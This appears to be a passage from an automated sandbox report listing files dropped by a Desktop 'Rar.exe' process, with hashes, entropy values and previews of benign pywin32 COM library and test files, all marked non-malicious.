                                                                                                                                                                                                                                  Preview:"""Python.Dictionary COM Server...This module implements a simple COM server that acts much like a Python.dictionary or as a standard string-keyed VB Collection. The keys of.the dictionary are strings and are case-insensitive...It uses a highly customized policy to fine-tune the behavior exposed to.the COM client...The object exposes the following properties:.. int Count (readonly). VARIANT Item(BSTR key) (propget for Item). Item(BSTR key, VARIANT value) (propput for Item).. Note that 'Item' is the default property, so the following forms of. VB code are acceptable:.. set ob = CreateObject("Python.Dictionary"). ob("hello") = "there". ob.Item("hi") = ob("HELLO")..All keys are defined, returning VT_NULL (None) if a value has not been.stored. To delete a key, simply assign VT_NULL to the key...The object responds to the _NewEnum method by returning an enumerator over.the dictionary's keys. This allows for the following
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1664
                                                                                                                                                                                                                                  Entropy (8bit):4.854103740699842
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:FMw3KxRNHwFrJKuXHIvL2n2qcqZLBHUvUVjvIC0u9/w:FM4KxR6FrJKoIzQIqZLBfjQC0u9/w
                                                                                                                                                                                                                                  MD5:043481AD1E25C1417AE87C27B647F87D
                                                                                                                                                                                                                                  SHA1:83B216E7DB147EEA48365225668F2B26ABE102AF
                                                                                                                                                                                                                                  SHA-256:865C5BACB0CD3EBE596AAA08F9DD7D7DDE9B203ACD4A1637E8920ED986555395
                                                                                                                                                                                                                                  SHA-512:71B9DC8ADBA9ED91E48D49E5A9A5F30F6C74E666CE280E386F23E0FBC6D2EDCB26194B9E7411409886DE71F6DC8CCB78C65DE48223778062604B4EE2F0AF9652
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Python.Interpreter COM Server.. This module implements a very very simple COM server which. exposes the Python interpreter... This is designed more as a demonstration than a full blown COM server.. General functionality and Error handling are both limited... To use this object, ensure it is registered by running this module. from Python.exe. Then, from Visual Basic, use "CreateObject('Python.Interpreter')",. and call its methods!."""..import winerror.from win32com.server.exception import Exception...# Expose the Python interpreter..class Interpreter:. """The interpreter object exposed via COM""".. _public_methods_ = ["Exec", "Eval"]. # All registration stuff to support fully automatic register/unregister. _reg_verprogid_ = "Python.Interpreter.2". _reg_progid_ = "Python.Interpreter". _reg_desc_ = "Python Interpreter". _reg_clsid_ = "{30BD3490-2632-11cf-AD5B-524153480001}". _reg_class_spec_ = "win32com.servers.interp.Interpreter".. def __init__(self)
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1164
                                                                                                                                                                                                                                  Entropy (8bit):4.9132762177228235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:I39k2E5hMQqvpdIGvzga+2Sk2vcSV4yWQSzCGfGQqklrGUMrDHlIpeXZM/Q/HN:wC2E5hMQqhdIGvg2R2vc0WQlGfGGtGh3
                                                                                                                                                                                                                                  MD5:FC57DB2AB422A0FBBF19FAEE627A7036
                                                                                                                                                                                                                                  SHA1:4AD31007AFDE4FBAED826C514CE860C61D599204
                                                                                                                                                                                                                                  SHA-256:5B3BE0A4E996218ACB5305D94685B8752B17C32F006859876973A3B8AABE7A45
                                                                                                                                                                                                                                  SHA-512:5A011AE1FB0A93A6E0C6CB337878384E9A86165FDCDDC4864F38DE90739E7E5A5BA3E7C684065CD664736CFCA07DC8A607299955F36E99EB28B4808F4CDCB49E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A COM Server which exposes the NT Performance monitor in a very rudimentary way..Usage from VB:..set ob = CreateObject("Python.PerfmonQuery")..freeBytes = ob.Query("Memory", "Available Bytes").""".import pythoncom.import win32pdhutil.import winerror.from win32com.server import exception, register...class PerfMonQuery:. _reg_verprogid_ = "Python.PerfmonQuery.1". _reg_progid_ = "Python.PerfmonQuery". _reg_desc_ = "Python Performance Monitor query object". _reg_clsid_ = "{64cef7a0-8ece-11d1-a65a-00aa00125a98}". _reg_class_spec_ = "win32com.servers.perfmon.PerfMonQuery". _public_methods_ = ["Query"].. def Query(self, object, counter, instance=None, machine=None):. try:. return win32pdhutil.GetPerformanceAttributes(. object, counter, instance, machine=machine. ). except win32pdhutil.error as exc:. raise exception.Exception(desc=exc.strerror). except TypeError as desc:. raise exception.Exc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5105
                                                                                                                                                                                                                                  Entropy (8bit):4.973183641509729
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:P3TP/djb7S6awwJdPeo1YaJ0BJ4Lk1bfvM6:fTP/17jawwfPEaJ6J4LkdfvM6
                                                                                                                                                                                                                                  MD5:8F95097AEDD504D036DADE45C6379215
                                                                                                                                                                                                                                  SHA1:A74546A08C65A5D86819ECD7125E54C8AD76EF5F
                                                                                                                                                                                                                                  SHA-256:9DF8CD7887DE8A6676B164603FF136FA455B31CA893CBF9FC05C44604F98D73E
                                                                                                                                                                                                                                  SHA-512:78876D96E9773EED3EBEEB7E448C7A9E9D2915F440644FC08B1060FB3EA99087F3FFB7C4BB0040DE692BD2FE6A2F6592CEB9750F3CAE68EB60A996415FD1492E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This is part of the Python test suite..# The object is registered when you first run the test suite..# (and hopefully unregistered once done ;-)..import pythoncom.import winerror..# Ensure the vtables in the tlb are known..from win32com import universal.from win32com.client import constants, gencache.from win32com.server.exception import COMException.from win32com.server.util import wrap..pythoncom.__future_currency__ = True.# We use the constants from the module, so must insist on a gencache..# Otherwise, use of gencache is not necessary (tho still advised).gencache.EnsureModule("{6BCDCB60-5605-11D0-AE5F-CADD4C000000}", 0, 1, 1)...class PyCOMTest:. _typelib_guid_ = "{6BCDCB60-5605-11D0-AE5F-CADD4C000000}". _typelib_version = 1, 0. _com_interfaces_ = ["IPyCOMTest"]. _reg_clsid_ = "{e743d9cd-cb03-4b04-b516-11d3a81c1597}". _reg_progid_ = "Python.Test.PyCOMTest".. def DoubleString(self, str):. return str * 2.. def DoubleInOutString(self, str):. return
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3029
                                                                                                                                                                                                                                  Entropy (8bit):5.133408473790648
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:mD5ZPfsTv+F3VJkSJ65MzlZCwDSfWtZItv+34hnraZDcu/LbFDwe5ZJoReRS4w:msT+Ff/GwDSf4ItM4rIDfzqimR+Pw
                                                                                                                                                                                                                                  MD5:F5C9F7C9D0DFD4D534CB514CBF4C88FB
                                                                                                                                                                                                                                  SHA1:BC4B8F8981DE8AEF0E78DB36B175838A0DF62729
                                                                                                                                                                                                                                  SHA-256:4EDC19EE04C728CE1090DA8B99C064D64402C5840D14B7FF7105F31D5CA4070D
                                                                                                                                                                                                                                  SHA-512:9AA3C5889AF5AB08EAFDE439A02478CBD620F959148A3AA4AFEE327C47683FB403451A4ADE312B5745A931ABEAF17563095000241433C8B256F63D70AE410312
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Constants related to IStorage and related interfaces..This file was generated by h2py from d:\msdev\include\objbase.h.then hand edited, a few extra constants added, etc.."""..STGC_DEFAULT = 0.STGC_OVERWRITE = 1.STGC_ONLYIFCURRENT = 2.STGC_DANGEROUSLYCOMMITMERELYTODISKCACHE = 4.STGC_CONSOLIDATE = 8..STGTY_STORAGE = 1.STGTY_STREAM = 2.STGTY_LOCKBYTES = 3.STGTY_PROPERTY = 4.STREAM_SEEK_SET = 0.STREAM_SEEK_CUR = 1.STREAM_SEEK_END = 2..LOCK_WRITE = 1.LOCK_EXCLUSIVE = 2.LOCK_ONLYONCE = 4..# Generated as from here...CWCSTORAGENAME = 32.STGM_DIRECT = 0x00000000.STGM_TRANSACTED = 0x00010000.STGM_SIMPLE = 0x08000000.STGM_READ = 0x00000000.STGM_WRITE = 0x00000001.STGM_READWRITE = 0x00000002.STGM_SHARE_DENY_NONE = 0x00000040.STGM_SHARE_DENY_READ = 0x00000030.STGM_SHARE_DENY_WRITE = 0x00000020.STGM_SHARE_EXCLUSIVE = 0x00000010.STGM_PRIORITY = 0x00040000.STGM_DELETEONRELEASE = 0x04000000.STGM_NOSCRATCH = 0x00100000.STGM_CREATE = 0x00001000.STGM_CONVERT = 0x00020000.STGM_FAILIFTHERE = 0x00000000.S
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2590
                                                                                                                                                                                                                                  Entropy (8bit):4.654726220942149
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kVl/gO8KovhKT3DPvInCRHnr82dF6TVJ5roiPX/37wJId+c+AKpx+:igO8Lv8T3DYnCRHnr76TL5rVn3cqdn1Z
                                                                                                                                                                                                                                  MD5:858099A3F7A74841062D8C1B1A1DB7F4
                                                                                                                                                                                                                                  SHA1:9738A5C3347FDDC7DF945384137411185F6F35DF
                                                                                                                                                                                                                                  SHA-256:BCE0F5A6607A22A26914A2AAF41F24923F6ED4F576233745EF8FECB50B5EF7A6
                                                                                                                                                                                                                                  SHA-512:28F5685D39D643BFFA736E5008296FFB18B1EDB67F9903AEBC422E92AFEE90F4B40F0E6CB3321BD5E4C3ACCD0244200F0A9ACA2B824B2B503E97F63C06FD003A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# Generate scripts needed for serious testing!.#.import os.import sys..import pythoncom.import win32com.import win32com.client.makepy.import win32com.test..genList = [. ("msword8", "{00020905-0000-0000-C000-000000000046}", 1033, 8, 0),.]..genDir = "Generated4Test"...def GetGenPath():. import win32api.. return os.path.join(win32api.GetFullPathName(win32com.test.__path__[0]), genDir)...def GenerateFromRegistered(fname, *loadArgs):. # tlb = apply(pythoncom.LoadRegTypeLib, loadArgs). genPath = GetGenPath(). try:. os.stat(genPath). except os.error:. os.mkdir(genPath). # Ensure an __init__ exists.. open(os.path.join(genPath, "__init__.py"), "w").close(). print(fname, ": generating -", end=" "). f = open(os.path.join(genPath, fname + ".py"), "w"). win32com.client.makepy.GenerateFromTypeLibSpec(. loadArgs, f, bQuiet=1, bGUIProgress=1. ). f.close(). print("compiling -", end=" "). fullModName = "win32com.test.%s.%s" % (
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1058
                                                                                                                                                                                                                                  Entropy (8bit):5.068577848338502
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:8m0bEDXfv3Yqf+IJHDCMIRbcbze5a6A6aUCVOKDLL9KyK9pY:L0bELffYqf+eHDCMIRbcmSDLMyT
                                                                                                                                                                                                                                  MD5:00593753703D199D8A458373BE78B180
                                                                                                                                                                                                                                  SHA1:CEEC7AA7DD4CAF1CD93C76E192B67638DB46AE9B
                                                                                                                                                                                                                                  SHA-256:D8AB7F9E02B106A9B1701B01A698780D17903D3D538AD04B3203DA0BB8000AF5
                                                                                                                                                                                                                                  SHA-512:8FC0CB09FC18ECEEEE259316C3647E878FA25E6895F91A31E468B70B5F07A7E9296CB5D3B0E41CB9E98DAF5930F7F16A2A85D6B448171B1575E3B06F6EC0C18E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:<scriptlet>..<Registration. Description="TestPys". ProgID="TestPys.Scriptlet". Version="1". ClassID="{2eeb6080-cd58-11d1-b81e-00a0240b2fef}">.. <SCRIPT LANGUAGE="VBScript"> ..Function Register()...Msgbox "Scriptlet 'Test' registered." ..End Function. ..Function Unregister()...Msgbox "Scriptlet 'Test' unregistered." ..End Function. </SCRIPT>.</Registration>..<implements id=Automation type=Automation>. <property name=PyProp1>. <get/>. <put/>. </property>. <property name=PyProp2>. <get/>. <put/>. </property>. <method name=PyMethod1>. </method>.. <method name=PyMethod2>. </method>.</implements>..<script language=python>..PyProp1 = "PyScript Property1";.PyProp2 = "PyScript Property2";..def get_PyProp1():. return PyProp1..def put_PyProp1(newValue):. global PyProp1. PyProp1 = newValue..def get_PyProp2():. return PyProp2..def put_PyProp2(newValue):. global PyProp2. PyProp2 = newValue..def PyMethod1():. return "PyMethod1 called"..def PyMethod2
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                                                                  Entropy (8bit):4.1320441859950465
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:SN7cFxF0MCwmFU3xVW2:SNiCwyWVH
                                                                                                                                                                                                                                  MD5:7CCF7BECD3241B3DC1FCBD65FA78C5D3
                                                                                                                                                                                                                                  SHA1:5C97396B7F0E4A95FDD2975F9B37ADDA5D508451
                                                                                                                                                                                                                                  SHA-256:6FAD9353D6B72032692FEE2309B2FF70ED526B68AA7F0F10E2131E852C1E8301
                                                                                                                                                                                                                                  SHA-512:BDBDE0EBA39622B7A6F4764E8B28814BBEBA058F8A5412F751C41F051A79BE85E02F2B7CE99A71C210C75DCC3581F8963F3CD40157817F76F843251A1AC37663
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Empty file to designate a Python package.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2275
                                                                                                                                                                                                                                  Entropy (8bit):4.53047818878344
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Om2KPnvJMkMr/QIA9e8Dt7PKkvVgw/iAII7qgqNMCu:OmX/vKkMrY79lDJnyw/i+qMX
                                                                                                                                                                                                                                  MD5:6DA80F9CEEDCD38A4E231BE269AAA38A
                                                                                                                                                                                                                                  SHA1:04CAFA660A9F339D87BA1EA0F0692296CCA8D4EE
                                                                                                                                                                                                                                  SHA-256:7B699EDF96060CBAB41AF35C0C0F9459E40F65DF75D07767A585E06A68E736B4
                                                                                                                                                                                                                                  SHA-512:6C0E1AAB36C177B0FF07D98E9992A6EC61354A5FA9F406D461205A9BA3C0EF59C11FC17992994A9274CAB3120EB4926391A814F0C5C16DEA8BDC9DE97DA406A9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# import dao3032.# No longer imported here - callers responsibility to load.#.import win32com.client...def DumpDB(db, bDeep=1):. # MUST be a DB object.. DumpTables(db, bDeep). DumpRelations(db, bDeep). DumpAllContainers(db, bDeep)...def DumpTables(db, bDeep=1):. for tab in db.TableDefs:. tab = db.TableDefs(tab.Name) # Redundant lookup for testing purposes.. print(. "Table %s - Fields: %d, Attributes:%d". % (tab.Name, len(tab.Fields), tab.Attributes). ). if bDeep:. DumpFields(tab.Fields)...def DumpFields(fields):. for field in fields:. print(. " %s, size=%d, reqd=%d, type=%d, defVal=%s". % (. field.Name,. field.Size,. field.Required,. field.Type,. str(field.DefaultValue),. ). )...def DumpRelations(db, bDeep=1):. for relation in db.Relations:. print(. "Relation %s - %
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9004
                                                                                                                                                                                                                                  Entropy (8bit):4.38218286632829
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:lOAcuYO8AjeLHVhLXlODUBSpmNumyqZFuxkNum/qSux5fkC7Q/NpLh5BlWK:Kuwhjw7QiAvGVoh5BlWK
                                                                                                                                                                                                                                  MD5:8F2899C1FEF4011198D8D735F04CAEEE
                                                                                                                                                                                                                                  SHA1:283AB4E3ACCA9A7D676A1482C2465B65D4A778DB
                                                                                                                                                                                                                                  SHA-256:02EDE4F09A9D11E8B19A924A885AEC2309F9FE0C7C43C487EFB178B32EAC1DB6
                                                                                                                                                                                                                                  SHA-512:61990392B37A133E8ACF88A68288CE4D66A9CB620C0289E91A1F62C3DF5AA7767E5B83076F85E3546AEC5586B719CD2CCFA92E2AB1A6F811A2B80E9727682AA2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# errorSemantics.py..# Test the Python error handling semantics. Specifically:.#.# * When a Python COM object is called via IDispatch, the nominated.# scode is placed in the exception tuple, and the HRESULT is.# DISP_E_EXCEPTION.# * When the same interface is called via IWhatever, the.# nominated scode is returned directly (with the scode also.# reflected in the exception tuple).# * In all cases, the description etc end up in the exception tuple.# * "Normal" Python exceptions resolve to an E_FAIL "internal error"..import pythoncom.import winerror.from win32com.client import Dispatch.from win32com.server.exception import COMException.from win32com.server.util import wrap.from win32com.test.util import CaptureWriter...class error(Exception):. def __init__(self, msg, com_exception=None):. Exception.__init__(self, msg, str(com_exception))...# Our COM server..class TestServer:. _public_methods_ = ["Clone", "Commit", "LockRegion", "Read"]. _com_interfaces_ = [python
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Java source, ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1852
                                                                                                                                                                                                                                  Entropy (8bit):5.4123717871378565
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:QXxmFu3M4pcjG2hbieT2XWh1bipqM6FNtsg6EqVpawtNLZUqsA:smFuf19WhcYtsoqVkmNj
                                                                                                                                                                                                                                  MD5:B5C7D77C0E0A157B3BB3E60C12720929
                                                                                                                                                                                                                                  SHA1:1C17D53A336572849F7F39068C377B20D29C122A
                                                                                                                                                                                                                                  SHA-256:20A7F279413384171B16C2DD282D1F37B07529FF18DB21707B7D0EEA6E6788D5
                                                                                                                                                                                                                                  SHA-512:A38B2C7A544404A06FED7A360F58CEC884B1929DD2B789C465C6ED01707A46D36B64E7E0EF1C0FC9FB4133357F17DF6F7C1BEBC7E42DE5AA6409DC394738375A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:// TestServer.idl : IDL source for TestServer.dll.//..// This file will be processed by the MIDL tool to.// produce the type library (TestServer.tlb) and marshalling code...import "oaidl.idl";.import "ocidl.idl";..[...object,...uuid(50086EE8-F535-464B-806E-365ADBB727CF),...dual,...helpstring("ITestServerApp Interface"),...pointer_default(unique)..]..interface ITestServerApp : IDispatch..{...[id(1), helpstring("method Test1")] HRESULT Test1([out, retval] ITestServerApp **pVal);...[id(2), helpstring("method Test2")] HRESULT Test2([out, retval] VARIANT *pVar);...[propget, id(3), helpstring("property MyProp1")] HRESULT MyProp1([out, retval] long *pVal);..};..[...object,...uuid(618DB2A3-D5BD-4850-B66A-828727EB37E5),...dual,...helpstring("IPippo Interface"),...pointer_default(unique)..]..interface IPippo : IDispatch..{.....[id(1), helpstring("method Method1")] HRESULT Method1([out, retval] IPippo **val);...[propget, id(2), helpstring("property MyProp1")] HRESULT MyProp1([out, retval] long *p
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2668
                                                                                                                                                                                                                                  Entropy (8bit):4.845449802014032
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:kGQgRgHtSdUZyT2KYeSZeiHqjaF+x7JH2hLxxbzXLEQjx7wig7RClxw0DGBDIUvt:SOgHUCUTt6Z/qRx7JObzXoQjxs/7RMRE
                                                                                                                                                                                                                                  MD5:31E596A4A116C132B9059E660328B010
                                                                                                                                                                                                                                  SHA1:B813D06DD26C3B4DA10F6697A17D4946AED62868
                                                                                                                                                                                                                                  SHA-256:0428F943D77AB53D3C4FB1B40CCE705B9CAE09AB5516D17D3BC0F83001FAF5A1
                                                                                                                                                                                                                                  SHA-512:0913AEE8ED8A9BD5A8ACD5BE4D1AB6EE80C51562C35B4D5481282AE91D484767D602963F75BA5D2F2C683144C878AB88D27599B427E0B7227D241599A1F64009
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# A little test server, complete with typelib, we can use for testing..# Originally submitted with bug:.# [ 753154 ] memory leak wrapping object having _typelib_guid_ attribute.# but modified by mhammond for use as part of the test suite..import os.import sys..import pythoncom.import win32com.import winerror.from win32com.server.util import wrap...class CPippo:. #. # COM declarations. #. _reg_clsid_ = "{1F0F75D6-BD63-41B9-9F88-2D9D2E1AA5C3}". _reg_desc_ = "Pippo Python test object". _reg_progid_ = "Python.Test.Pippo". # _reg_clsctx_ = pythoncom.CLSCTX_LOCAL_SERVER. ###. ### Link to typelib. _typelib_guid_ = "{7783054E-9A20-4584-8C62-6ED2A08F6AC6}". _typelib_version_ = 1, 0. _com_interfaces_ = ["IPippo"].. def __init__(self):. self.MyProp1 = 10.. def Method1(self):. return wrap(CPippo()).. def Method2(self, in1, inout1):. return in1, inout1 * 2.. def Method3(self, in1):. # in1 will be a tuple, not a list..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3162
                                                                                                                                                                                                                                  Entropy (8bit):4.799405335387886
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:qHKBl1In7GNgJqshzp4RkNFVDY2kXku1yJ6tKf7Ivo7Mq:yaNgJqshNNnky4tm37Mq
                                                                                                                                                                                                                                  MD5:0EAE751168AFC8B1EAC7CD2BC2491E66
                                                                                                                                                                                                                                  SHA1:B57A463F531E46F9F1E1449D2B78CF36D4D7AC32
                                                                                                                                                                                                                                  SHA-256:42748BD390A7C58280E7ECFF5F8EDC1FFD731885B7A5BD20CD835E42326CC20C
                                                                                                                                                                                                                                  SHA-512:C973B03123F8B62F7AB4561E164EAC9C5ED195AF01440FA65A5513B821E0D276C752984A515BEB0625975EEC3F87F3A32C53F026D58E81D882B36008C5F1C0A2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import unittest..import pythoncom.import win32com.client.import win32com.server.util.import win32com.test.util.import winerror...class Error(Exception):. pass...# An object representing a list of numbers.class PythonSemanticClass:. _public_methods_ = ["In"] # DISPIDs are allocated.. _dispid_to_func_ = {10: "Add", 11: "Remove"} # DISPIDs specified by the object... def __init__(self):. self.list = [].. def _NewEnum(self):. return win32com.server.util.NewEnum(self.list).. def _value_(self):. # should return an array.. return self.list.. def _Evaluate(self):. # return the sum. return sum(self.list).. def In(self, value):. return value in self.list.. def Add(self, value):. self.list.append(value).. def Remove(self, value):. self.list.remove(value)...def DispExTest(ob):. if not __debug__:. print("WARNING: Tests dressed up as assertions are being skipped!"). assert ob.GetDispID("Add", 0
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2788
                                                                                                                                                                                                                                  Entropy (8bit):4.505156868473806
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:KDeDWnty1wVrWA6e8AV0YmHBYyjdTbGlFDFC2Vnxc/aHSm3:KDeeAmWAhVxOyqdPqVFZxYMB3
                                                                                                                                                                                                                                  MD5:D170E9179ED45F2FFB7C6F560FE07974
                                                                                                                                                                                                                                  SHA1:420A06DDC0F8FCCB9247D3925D289B6A2B10D6A4
                                                                                                                                                                                                                                  SHA-256:41D36D127B053B0B77CD7B282275D52B892989C40452358471FA43729923432A
                                                                                                                                                                                                                                  SHA-512:31D63C719A5E1085533A5D3D4D77FB1F133EE9A9FC502E3744786520C38AA55F99EFD670E77CDAFCB41785E164A3AF805788BB1660FE079065268A4D264D38E5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import os.import time..import pythoncom.from win32com.client import Dispatch, DispatchWithEvents, constants..finished = 0 # Flag for the wait loop from (3) to test...class ADOEvents: # event handler class. def OnWillConnect(self, str, user, pw, opt, sts, cn):. # Must have this event, as if it is not handled, ADO assumes the. # operation is cancelled, and raises an error (Operation cancelled. # by the user). pass.. def OnConnectComplete(self, error, status, connection):. # Assume no errors, until we have the basic stuff. # working. Now, "connection" should be an open. # connection to my data source. # Do the "something" from (2). For now, just. # print the connection data source. print("connection is", connection). print("Connected to", connection.Properties("Data Source")). # OK, our work is done. Let the main loop know. global finished. finished = 1.. def OnCommitTransComplete(
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1334
                                                                                                                                                                                                                                  Entropy (8bit):4.768567300771705
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:BxgWbb79C7MZ83h8XlyPXEQIh6q7M+J8dHx+qfcj2IK7M+J88YOsdRf2/pLMb:BxgMhiMDlEEQZqMX+QcgMEadi4
                                                                                                                                                                                                                                  MD5:0EA7B173234195812C288240590CB6C6
                                                                                                                                                                                                                                  SHA1:835328B2831B2F8DAE57EF7F2074D2599895590E
                                                                                                                                                                                                                                  SHA-256:27DAAD392421D9D968F73448E585EC9010C8A4C6F119AB0079D8015899D5838E
                                                                                                                                                                                                                                  SHA-512:4D4F237E9E632540A7591F5C50F4449199ABF0F0411B1A4E67815099DA69395719D705D5E5976E9EE0C73D3541984376F8764D18371A5D1E24ED3AFCB408104C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Test AXScripting the best we can in an automated fashion....import os.import sys..import win32api.import win32com.axscript.import win32com.axscript.client.import win32com.test.util..verbose = "-v" in sys.argv...class AXScript(win32com.test.util.TestCase):. def setUp(self):. file = win32api.GetFullPathName(. os.path.join(win32com.axscript.client.__path__[0], "pyscript.py"). ). from win32com.test.util import RegisterPythonServer.. self.verbose = verbose. RegisterPythonServer(file, "python", verbose=self.verbose).. def testHost(self):. file = win32api.GetFullPathName(. os.path.join(win32com.axscript.__path__[0], "test\\testHost.py"). ). cmd = '%s "%s"' % (win32api.GetModuleFileName(0), file). if verbose:. print("Testing Python Scripting host"). win32com.test.util.ExecuteShellCommand(cmd, self).. def testCScript(self):. file = win32api.GetFullPathName(. os.pat
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5780
                                                                                                                                                                                                                                  Entropy (8bit):4.725019650399569
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Wktg4A4KElc/6vGc8XBfe0zXYFRmqdZ9E/1RL9//VrxSAth5L0PWWX6w0kqtioVg:jv06vG7XBfXXwRmq/u/1Jx/VrxSAth5Q
                                                                                                                                                                                                                                  MD5:061C7D4B0F39A434B949194498C2B08F
                                                                                                                                                                                                                                  SHA1:C9394BD4640559CEF1B236F076FDA4F276AE21CA
                                                                                                                                                                                                                                  SHA-256:101DBE1A4A0FC8C78284602097D2F7DB34345C18B9C9E416A7709BB54E844515
                                                                                                                                                                                                                                  SHA-512:A45A9E9CEBC051B6635F75832CCC09DB5F6F7BD81EAEB6026BF9DCA39C78F64B32110AB4A7B590DB201F2940355528A3B0656159BCF1435398D72006A108E9D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#.# This assumes that you have MSAccess and DAO installed..# You need to run makepy.py over "msaccess.tlb" and.# "dao3032.dll", and ensure the generated files are on the.# path...# You can run this with no args, and a test database will be generated..# You can optionally pass a dbname on the command line, in which case it will be dumped...import os.import sys..import pythoncom.import win32api.from win32com.client import Dispatch, constants, gencache...def CreateTestAccessDatabase(dbname=None):. # Creates a test access database - returns the filename.. if dbname is None:. dbname = os.path.join(win32api.GetTempPath(), "COMTestSuiteTempDatabase.mdb").. access = Dispatch("Access.Application"). dbEngine = access.DBEngine. workspace = dbEngine.Workspaces(0).. try:. os.unlink(dbname). except os.error:. print(. "WARNING - Unable to delete old test database - expect a COM exception RSN!". ).. newdb = workspace.CreateDatabase(.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2061
                                                                                                                                                                                                                                  Entropy (8bit):4.550510002812803
                                                                                                                                                                                                                                  Encrypted:false
